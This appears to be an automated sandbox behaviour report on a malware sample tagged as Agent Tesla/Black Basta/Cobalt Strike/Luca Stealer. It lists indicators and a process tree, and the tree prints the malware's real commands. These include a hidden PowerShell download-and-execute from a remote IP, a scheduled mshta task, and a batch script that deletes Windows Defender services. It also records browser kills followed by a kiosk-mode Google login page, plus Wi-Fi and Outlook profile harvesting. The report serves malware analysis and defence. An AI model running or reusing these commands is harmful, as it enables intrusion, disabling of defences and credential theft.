\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 KXtPusH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier KXtPusH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 452 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 5020 taskkill.exe 632 taskkill.exe 3232 taskkill.exe 464 taskkill.exe 3012 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1332 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 656 powershell.exe 656 powershell.exe 4304 TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE 4304 TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE 1744 rapes.exe 1744 rapes.exe 3848 KXtPusH.exe 3848 KXtPusH.exe 3848 KXtPusH.exe 1520 0d58f17e45.exe 1520 0d58f17e45.exe 1800 5a6472d2dc.exe 1800 5a6472d2dc.exe 976 632e73f709.exe 976 632e73f709.exe 976 632e73f709.exe 976 632e73f709.exe 976 632e73f709.exe 976 632e73f709.exe 3744 rapes.exe 3744 rapes.exe 4000 a399701ee4.exe 4000 a399701ee4.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 5980 c6eefc65db.exe 5980 c6eefc65db.exe 5980 c6eefc65db.exe 5980 c6eefc65db.exe 5980 c6eefc65db.exe 5284 MSBuild.exe 5284 MSBuild.exe 5284 MSBuild.exe 5284 MSBuild.exe 5168 e64ba97824.exe 5168 e64ba97824.exe 5168 e64ba97824.exe 5168 e64ba97824.exe 5564 Rm3cVPI.exe 5564 Rm3cVPI.exe 5564 Rm3cVPI.exe 5564 Rm3cVPI.exe 2756 powershell.exe 2756 powershell.exe 2756 powershell.exe 12964 rapes.exe 12964 rapes.exe 5700 MSBuild.exe 5700 MSBuild.exe 5700 MSBuild.exe 5700 MSBuild.exe 6464 MSBuild.exe 6464 MSBuild.exe 6464 MSBuild.exe 6464 MSBuild.exe 6516 fontdrvhost.exe 6516 fontdrvhost.exe 6516 fontdrvhost.exe 6516 fontdrvhost.exe 5752 4ef68b1a92.exe 5752 4ef68b1a92.exe 5752 4ef68b1a92.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 668 Process not Found 668 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1968 UZPt0hR.exe 1968 UZPt0hR.exe 1968 UZPt0hR.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 656 powershell.exe Token: SeDebugPrivilege 3848 KXtPusH.exe Token: SeDebugPrivilege 632 taskkill.exe Token: SeDebugPrivilege 3232 taskkill.exe Token: SeDebugPrivilege 464 taskkill.exe Token: SeDebugPrivilege 3012 taskkill.exe Token: SeDebugPrivilege 5020 taskkill.exe Token: SeDebugPrivilege 4752 firefox.exe Token: SeDebugPrivilege 4752 firefox.exe Token: SeDebugPrivilege 5980 c6eefc65db.exe Token: SeDebugPrivilege 2756 powershell.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 3304 2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3304 2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3304 2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4304 TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 4752 firefox.exe 3432 9bdc94caf0.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 3432 9bdc94caf0.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 4752 firefox.exe -
Suspicious use of SendNotifyMessage 26 IoCs
pid Process 3304 2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3304 2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3304 2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 3432 9bdc94caf0.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 4752 firefox.exe 3432 9bdc94caf0.exe 3432 9bdc94caf0.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4752 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3304 wrote to memory of 4028 3304 2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3304 wrote to memory of 4028 3304 2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3304 wrote to memory of 4028 3304 2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3304 wrote to memory of 4136 3304 2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3304 wrote to memory of 4136 3304 2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3304 wrote to memory of 4136 3304 2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 4028 wrote to memory of 1332 4028 cmd.exe 89 PID 4028 wrote to memory of 1332 4028 cmd.exe 89 PID 4028 wrote to memory of 1332 4028 cmd.exe 89 PID 4136 wrote to memory of 656 4136 mshta.exe 91 PID 4136 wrote to memory of 656 4136 mshta.exe 91 PID 4136 wrote to memory of 656 4136 mshta.exe 91 PID 656 wrote to memory of 4304 656 powershell.exe 100 PID 656 wrote to memory of 4304 656 powershell.exe 100 PID 656 wrote to memory of 4304 656 powershell.exe 100 PID 4304 wrote to memory of 1744 4304 TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE 101 PID 4304 wrote to memory of 1744 4304 TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE 101 PID 4304 wrote to memory of 1744 4304 TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE 101 PID 1744 wrote to memory of 1840 1744 rapes.exe 104 PID 1744 wrote to memory of 1840 1744 rapes.exe 104 PID 1744 wrote to memory of 1840 1744 rapes.exe 104 PID 1840 wrote to memory of 1708 1840 apple.exe 105 PID 1840 wrote to memory of 1708 1840 apple.exe 105 PID 1840 wrote to memory of 1708 1840 apple.exe 105 PID 1708 wrote to memory of 1704 1708 261.exe 107 PID 1708 wrote to memory of 1704 1708 261.exe 107 PID 1704 wrote to memory of 2220 1704 cmd.exe 109 PID 1704 wrote to memory of 2220 1704 cmd.exe 109 PID 1704 wrote to memory of 2220 1704 cmd.exe 109 PID 2220 wrote to memory of 4936 2220 261.exe 110 PID 2220 wrote to memory of 4936 2220 261.exe 110 PID 4936 wrote to memory of 3016 4936 cmd.exe 112 PID 4936 wrote to memory of 3016 4936 cmd.exe 112 PID 4936 wrote to memory of 3560 4936 cmd.exe 113 PID 4936 wrote to memory of 3560 4936 cmd.exe 113 PID 4936 wrote to memory of 452 4936 cmd.exe 114 PID 4936 wrote to memory of 452 4936 cmd.exe 114 PID 4936 wrote to memory of 4064 4936 cmd.exe 115 PID 4936 wrote to memory of 4064 4936 cmd.exe 115 PID 4936 wrote to memory of 736 4936 cmd.exe 116 PID 4936 wrote to memory of 736 4936 cmd.exe 116 PID 4936 wrote to memory of 396 4936 cmd.exe 117 PID 4936 wrote to memory of 396 4936 cmd.exe 117 PID 4936 wrote to memory of 112 4936 cmd.exe 118 PID 4936 wrote to memory of 112 4936 cmd.exe 118 PID 4936 wrote to memory of 3704 4936 cmd.exe 119 PID 4936 wrote to memory of 3704 4936 cmd.exe 119 PID 4936 wrote to memory of 4048 4936 cmd.exe 120 PID 4936 wrote to memory of 4048 4936 cmd.exe 120 PID 4936 wrote to memory of 4856 4936 cmd.exe 121 PID 4936 wrote to memory of 4856 4936 cmd.exe 121 PID 4936 wrote to memory of 3668 4936 cmd.exe 122 PID 4936 wrote to memory of 3668 4936 cmd.exe 122 PID 4936 wrote to memory of 4652 4936 cmd.exe 123 PID 4936 wrote to memory of 4652 4936 cmd.exe 123 PID 4936 wrote to memory of 1300 4936 cmd.exe 124 PID 4936 wrote to memory of 1300 4936 cmd.exe 124 PID 4936 wrote to memory of 5048 4936 cmd.exe 125 PID 4936 wrote to memory of 5048 4936 cmd.exe 125 PID 4936 wrote to memory of 2340 4936 cmd.exe 126 PID 4936 wrote to memory of 2340 4936 cmd.exe 126 PID 4936 wrote to memory of 1064 4936 cmd.exe 127 PID 4936 wrote to memory of 1064 4936 cmd.exe 127 PID 4936 wrote to memory of 1184 4936 cmd.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2632
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6516
-
-
C:\Users\Admin\AppData\Local\Temp\2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 2iNNYmagjba /tr "mshta C:\Users\Admin\AppData\Local\Temp\38eVJjXmk.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 2iNNYmagjba /tr "mshta C:\Users\Admin\AppData\Local\Temp\38eVJjXmk.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1332
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\38eVJjXmk.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Users\Admin\AppData\Local\TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE"C:\Users\Admin\AppData\Local\TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C6EA.tmp\C6EB.tmp\C6EC.bat C:\Users\Admin\AppData\Local\Temp\261.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C861.tmp\C862.tmp\C863.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:3016
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:3560
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:452
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4064
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:736
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:396
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:112
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:3704
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:4048
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:4856
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:3668
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:4652
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:1300
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:5048
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:2340
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:1064
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:1184
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:1816
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:3676
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:3284
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:4024
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:2740
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:1340
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:4172
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:1520
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:656
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:3216
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:2408
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:1556
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:3656
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:4812
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:4176
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:3096
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:4052
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:2484
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:2520
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:4156
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:2756
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:3128
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:2444
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:848
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:1248
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:5088
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:2368
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:3696
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:4124
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:4236
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:5076
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:1044
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:4504
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:2360
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:3584
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:740
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:1624
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:3524
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:2848
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:2600
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:4796
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:3052
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4572
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:1876
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe"C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe"6⤵
- Executes dropped EXE
PID:704
-
-
C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe"C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe"6⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3848 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All7⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3052 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
- System Location Discovery: System Language Discovery
PID:3432
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile8⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2220
-
-
C:\Windows\SysWOW64\findstr.exefindstr All8⤵
- System Location Discovery: System Language Discovery
PID:3528
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 24647⤵
- Program crash
PID:1936
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid7⤵
- System Location Discovery: System Language Discovery
PID:2148 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
- System Location Discovery: System Language Discovery
PID:5048
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid8⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2872
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419530101\0d58f17e45.exe"C:\Users\Admin\AppData\Local\Temp\10419530101\0d58f17e45.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1520 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10419530101\0d58f17e45.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3656
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419540101\5a6472d2dc.exe"C:\Users\Admin\AppData\Local\Temp\10419540101\5a6472d2dc.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1800 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10419540101\5a6472d2dc.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5048
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419550101\632e73f709.exe"C:\Users\Admin\AppData\Local\Temp\10419550101\632e73f709.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:976
-
-
C:\Users\Admin\AppData\Local\Temp\10419560101\a399701ee4.exe"C:\Users\Admin\AppData\Local\Temp\10419560101\a399701ee4.exe"6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4000
-
-
C:\Users\Admin\AppData\Local\Temp\10419570101\9bdc94caf0.exe"C:\Users\Admin\AppData\Local\Temp\10419570101\9bdc94caf0.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3432 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:464
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:3084
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4752 -
